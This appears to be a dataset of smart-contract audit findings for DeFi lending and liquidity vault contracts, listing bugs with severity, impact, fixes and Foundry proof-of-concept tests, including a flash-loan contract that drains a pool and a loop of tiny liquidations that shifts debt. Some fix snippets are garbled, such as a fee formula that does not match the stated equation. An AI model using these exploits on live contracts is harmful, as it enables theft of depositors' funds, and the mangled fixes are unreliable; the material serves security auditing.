MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\nчWe need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, \"Pool: borrower not liquidatable\");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\nчA liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.ч```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n -Users can borrow all loan tokensчmediumчUtilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Pool.sol\";\\nimport \"../src/Factory.sol\";\\nimport \"./mocks/Borrower.sol\";\\nimport \"./mocks/ERC20.sol\";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), \"G\");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\nчA possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.чThe vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n -Fee share calculation is incorrectчmediumчFees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.��Use the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\nчFee recipient is given more fees than intended, which results in less interest for LPsч```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n -fund loss because calculated Interest would be 0 in getCurrentState() due to division errorчmediumчfunction `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.чdon't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.чborrowers won't pay any interest and lenders would lose funds.ч```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n -cachedUserRewards variable is never reset, so user can steal all rewardsчhighчcachedUserRewards variable is never reset, so user can steal all rewards\\nWhen user wants to withdraw then `_withdrawUpdateRewardState` function is called. This function updates internal reward state and claims rewards for user if he provided `true` as `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen user calls claimRewards, then `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` variable is never reset to 0, once user claimed that amount.\\nBecause of that he can claim multiple times in order to receive all balance of token.чOnce user received rewards, reset `cachedUserRewards` variable to 0. This can be done inside `_claimInternalRewards` function.чUser can steal all rewardsч```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n -User can receive more rewards through a mistake in the withdrawal logicчhighчIn the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\nчFirst calculate `cachedUserRewards` then reset `userRewardDebts`.чA user can receive more reward tokens than they should by abusing the withdrawal system.ч```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -Vault can experience long downtime periodsчmediumчThe chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the balancer pool spot price is within the boundaries defined by `THRESHOLD` respect to the last fetched chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), then the OHM derived oracle price could stay at up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price fro up to 24 h. During this period withdrawals and deposits will revert.чIssue Vault can experience long downtime periods\\n`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time.Only a tight range of values around 2% should be allowed to avoid the scenario above.чWithdrawals and deposits can be often unavailable for several hours.ч```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n -SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrectчmediumчSingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, the amount_ is less than LIMIT + 1000 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns 1000 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\nчIssue SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP // Remove the line below\\n= lpAmount_;\\n lpPositions[msg.sender] // Remove the line below\\n= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = _withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] // Remove the line below\\n= pairTokenReceived > userDeposit\\n ? userDeposit\\n : pairTokenReceived;\\n// Remove the line below\\n ohmMinted // Remove the line below\\n= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived // Remove the line below\\n ohmMinted : 0;\\n```\\nчIt will make the calculation involving ohmMinted incorrect.ч```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? 